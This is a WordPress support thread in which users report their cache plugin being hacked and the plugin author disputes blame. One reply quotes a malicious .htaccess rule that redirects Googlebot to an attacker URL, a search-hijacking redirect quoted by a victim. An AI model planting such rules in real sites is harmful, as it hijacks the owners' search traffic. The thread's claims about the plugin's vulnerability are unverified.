cache hacked

  • Lately my site is getting hacked. The hacker inserts links into the cached versions of pages on the site. I noticed that permissions on some of the hacked files are changed to 666. I can delete the cache and the links go away but they come back in a day or two. I noticed that last year this plugin had a similar exploit. Is it possible it has a new, undiscovered security issue? My theme and all plugins are up to date.

    The page I need help with: [log in to see the link]

Viewing 5 replies - 1 through 5 (of 5 total)
  • Plugin Author Emre Vona

    (@emrevona)

    you have already been hacked so he can changed the files.

    Hello last week my website WP Fastest Cache plugin is been hacked and .htaccess file changed to:

    # BEGIN WpFastestCache
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} Googlebot
    RewriteRule (.*) https://www.hackerurl.com [L,R=301]

    The result was the User-declared canonical in google console change to https://www.hackerurl.com and my domain wasn’t indexed by google.

    So I found that it was the WpFastestCache plugin.
    After that I update the plugin today and I hope not happent again because it was my bussiness website and cost me some customers.

    • This reply was modified 4 years, 3 months ago by qstudios.
    Plugin Author Emre Vona

    (@emrevona)

    It’s wrong to blame us if you’re not sure. wp fastest cache has no known vulnerabilities.

    I’m sure becase I’ve test it before write this comment.
    When I update the plugin .htaccess file stop changing with the hack url.

    Plugin Author Emre Vona

    (@emrevona)

    how do you know that the htaccess is changed via the vulnerability of wp fastest cache? your hosting may have already been hacked.

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘cache hacked’ is closed to new replies.